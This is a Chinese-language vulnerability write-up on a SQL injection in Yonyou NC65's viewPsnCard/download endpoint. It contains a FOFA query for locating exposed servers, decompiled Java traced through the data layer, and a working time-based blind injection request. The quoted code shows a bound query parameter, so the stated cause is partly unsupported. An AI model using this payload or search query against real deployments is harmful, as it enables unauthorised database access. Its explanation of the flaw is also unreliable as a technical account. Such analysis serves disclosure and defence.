漏洞简介
用友NC系统可利用/portal/pt/viewPsnCard/download接口中的 pk_rpt_def 参数实现sql注入,从而窃取服务器的敏感信息。
影响版本
NC65
fofa语法
app="用友-UFIDA-NC"
漏洞分析
nc/bs/hrss/pub/action/PsnCardAction.class
package nc.bs.hrss.pub.action;
import java.io.FileInputStream;
import java.io.OutputStream;
import java.net.URLEncoder;
import nc.bs.framework.common.NCLocator;
import nc.bs.logging.Logger;
import nc.bs.ml.NCLangResOnserver;
import nc.itf.hi.IRptQueryService;
import nc.itf.hr.tools.rtf.IGenerateRTFDocument;
import nc.uap.lfw.core.exception.LfwRuntimeException;
import nc.uap.lfw.servletplus.annotation.Action;
import nc.uap.lfw.servletplus.annotation.Servlet;
import nc.uap.lfw.servletplus.core.impl.BaseAction;
import nc.vo.hi.repdef.RepDefVO;
import nc.vo.ml.NCLangRes4VoTransl;
import nc.vo.pub.BusinessException;
import nc.vo.uif2.LoginContext;
import org.apache.commons.io.IOUtils;
import uap.lfw.core.ml.LfwResBundle;
@Servlet(
path = "/viewPsnCard"
)
public class PsnCardAction extends BaseAction {
public PsnCardAction() {
}
@Action
public void download() {
OutputStream out = null;
try {
this.request.setCharacterEncoding("UTF-8");
String pk_rpt_def = this.request.getParameter("pk_rpt_def");
String pk_psnjob = this.request.getParameter("pk_psnjob");
RepDefVO repDefVO = ((IRptQueryService)NCLocator.getInstance().lookup(IRptQueryService.class)).queryByPk(pk_rpt_def);
FileInputStream finput = null;
pk_rpt_def 带入 queryByPk 函数
public RepDefVO queryByPk(String pk) throws BusinessException {
return (RepDefVO)(new BaseDAO()).retrieveByPK(RepDefVO.class, pk);
}
public Object retrieveByPK(Class className, String pk) throws DAOException {
PersistenceManager manager = null;
Object values = null;
try {
manager = this.createPersistenceManager(this.dataSource);
values = manager.retrieveByPK(className, pk);
public Object retrieveByPK(Class className, String pk, String[] selectedFields) throws DbException {
SuperVO vo = this.initSuperVOClass(className);
if (pk == null) {
throw new IllegalArgumentException("pk is null");
} else {
SQLParameter param = new SQLParameter();
param.addParam(pk.trim());
List results = (List)this.retrieveByClause(className, vo.getPKFieldName() + "=?", selectedFields, param);
return results.size() >= 1 ? results.get(0) : null;
}
}
public Collection retrieveByClause(Class className, String condition, String[] fields, SQLParameter parameters) throws DbException {
BaseProcessor processor = new BeanListProcessor(className);
return (Collection)this.session.executeQuery(this.buildSql(className, condition, fields), parameters, processor);
}
最终调用 executeQuery 执行拼接的SQL语句,造成SQL注入漏洞。
漏洞复现
漏洞利用示例
GET /portal/pt/viewPsnCard/download?pageId=login&pk_rpt_def=1'+and+1=DBMS_PIPE.RECEIVE_MESSAGE('RDS',5)--&pk_psnjob=1 HTTP/1.1
HTTP/1.1
Host: nc.mrxn.net

成功延时 5 秒
这个洞和前面 用友NC rmwebImage/download sql注入漏洞 和 用友NC rmImage/download sql注入漏洞 两个洞差不多,只不过这个也是未公开的漏洞。


